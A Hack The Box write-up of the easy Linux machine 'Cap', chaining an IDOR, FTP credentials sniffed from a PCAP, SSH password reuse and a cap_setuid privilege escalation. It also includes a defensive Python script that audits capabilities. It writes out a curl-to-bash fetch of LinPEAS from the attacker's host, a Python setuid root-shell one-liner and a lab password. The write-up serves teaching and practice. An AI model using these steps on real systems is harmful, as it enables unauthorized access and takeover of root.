Cap - Easy Linux

Hack The Box — Machine Writeup

Easy · Linux · Mar 7, 2026 · IDOR · FTP Sniffing · Linux Capabilities

Cap is an easy Linux machine hosting a security dashboard with a classic IDOR vulnerability. A network capture exposes FTP credentials in plaintext, granting an initial foothold. Privilege escalation abuses a misconfigured Python capability (cap_setuid) for a trivial root shell.

Difficulty: Easy

01 — Reconnaissance

We start with an Nmap scan to enumerate open ports and service versions:

nmap -sC -sV -oN cap.nmap 10.129.1.204

The scan reveals three open ports:

Port     Service  Version                            Notes
21/tcp   FTP      vsftpd 3.0.3                       Worth revisiting
22/tcp   SSH      OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80/tcp   HTTP     Gunicorn                           Security Dashboard

The webserver is a Python/Gunicorn app advertising itself as a "Security Dashboard." That's interesting — let's poke at it.

02 — IDOR — Accessing Other Users' Captures

After browsing to the dashboard and logging in as nathan, the app offers a page to view network packet captures. The URL looks something like /data/1 — with a numeric ID in the path.

🔎
Vulnerability Found — IDOR
Changing the ID parameter to 0 exposes captures belonging to other users. No authorization check is performed server-side.

At /data/0 we find a PCAP file we didn't generate. Time to download it and open it in Wireshark.

03 — FTP Credential Extraction

Opening the PCAP in Wireshark and filtering for FTP traffic immediately reveals a plaintext login sequence. FTP transmits credentials with no encryption:

ftp
<-- 220 (vsFTPd 3.0.3)
USER nathan
<-- 331 Please specify the password.
PASS Buck3tH4TF0RM3!
<-- 230 Login successful.
🔑
Credentials Recovered
nathan : Buck3tH4TF0RM3!

04 — Initial Foothold — SSH as Nathan

Users tend to reuse passwords. The FTP credentials work over SSH too:

ssh nathan@10.129.1.204
# password: Buck3tH4TF0RM3!
User Flag — Captured
cat ~/user.txt — flag in hand.

05 — Privilege Escalation — Linux Capabilities

With a foothold established, it's time to enumerate for privilege escalation. Dropping LinPEAS onto the box via a Python HTTP server:

# attacker machine: serve linpeas.sh over HTTP
python3 -m http.server 8000
# target: fetch the script and run it
curl http://<YOUR_IP>:8000/linpeas.sh | bash

LinPEAS highlights something juicy — a non-standard Linux capability assigned to the Python binary:

/usr/bin/python3.8 = cap_setuid+ep
⚠️
Misconfiguration — cap_setuid on Python
cap_setuid allows a process to arbitrarily change its UID. When granted to an interpreter like Python, an attacker can call os.setuid(0) to become root without ever needing the SUID bit or sudo rights.

Exploiting this is trivially simple — one line of Python:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
🏴
Root Shell Obtained
We are now uid=0(root). Grab /root/root.txt and we're done.
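
The cap_setuid finding above, turned into a defensive audit (an added example, not part of the original writeup or of LinPEAS): it parses getcap -r / output in both the older "path = caps+ep" and newer "path caps=ep" layouts and reports binaries whose permitted set holds a root-equivalent capability. The DANGEROUS list, the function names and every sample line except the python3.8 one are assumptions made for this example.

```python
import re

# Capabilities that amount to root when a general-purpose interpreter holds
# them (a selection made for this example, not an exhaustive list).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
             "cap_sys_module", "cap_chown", "cap_fowner"}

# One clause of capability text: optional name list, then operator/flag groups.
CLAUSE = r"[a-z0-9_,]*(?:[=+-][eip]*)+"
# Older getcap prints "path = caps+ep", newer prints "path caps=ep". The lone
# "=" in the older layout parses as a clause that clears every flag.
LINE = re.compile(rf"^(?P<path>.+?) (?P<caps>{CLAUSE}(?: {CLAUSE})*)$")

def permitted_dangerous(cap_text):
    """Return the DANGEROUS capabilities left in the file's permitted set."""
    flags = {cap: set() for cap in DANGEROUS}
    for clause in cap_text.split():
        names, ops = re.fullmatch(r"([a-z0-9_,]*)(.+)", clause).groups()
        listed = set(names.split(",")) - {""}
        # An empty list or "all" addresses every capability.
        targets = DANGEROUS if not listed or "all" in listed else listed & DANGEROUS
        for op, fl in re.findall(r"([=+-])([eip]*)", ops):
            for cap in targets:
                # "=" resets the flags first; "+" raises; "-" lowers.
                base = set() if op == "=" else flags[cap]
                flags[cap] = base - set(fl) if op == "-" else base | set(fl)
    return sorted(cap for cap, fl in flags.items() if "p" in fl)

def audit(getcap_output):
    """Map each path to the dangerous capabilities it is permitted."""
    findings = {}
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        if m and (caps := permitted_dangerous(m["caps"])):
            findings[m["path"]] = caps
    return findings

# Constructed sample; the first line is the LinPEAS finding from this writeup.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/opt/tools/perl cap_setuid,cap_net_bind_service=eip
/opt/tools/everything =ep
"""

if __name__ == "__main__":
    for path, caps in audit(SAMPLE).items():
        print(f"{path}: {', '.join(caps)}")
```

Anything this reports on an interpreter or debugger should have the capability removed with setcap -r, or be replaced by a narrowly scoped helper.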

06 — Attack Chain Summary

1. Nmap Scan: Identified FTP (21), SSH (22), and a Gunicorn web app (80).
2. IDOR on /data/:id: Setting the capture ID to 0 exposed another user's PCAP file.
3. FTP Credential Sniffing: Wireshark analysis of the PCAP revealed nathan:Buck3tH4TF0RM3! in plaintext.
4. SSH Login → user.txt: Password reuse granted SSH access and the user flag.
5. cap_setuid Abuse → root: Python's cap_setuid capability was exploited to spawn a root shell.

User Flag: Obtained via SSH as nathan
Root Flag: Obtained via cap_setuid Python exploit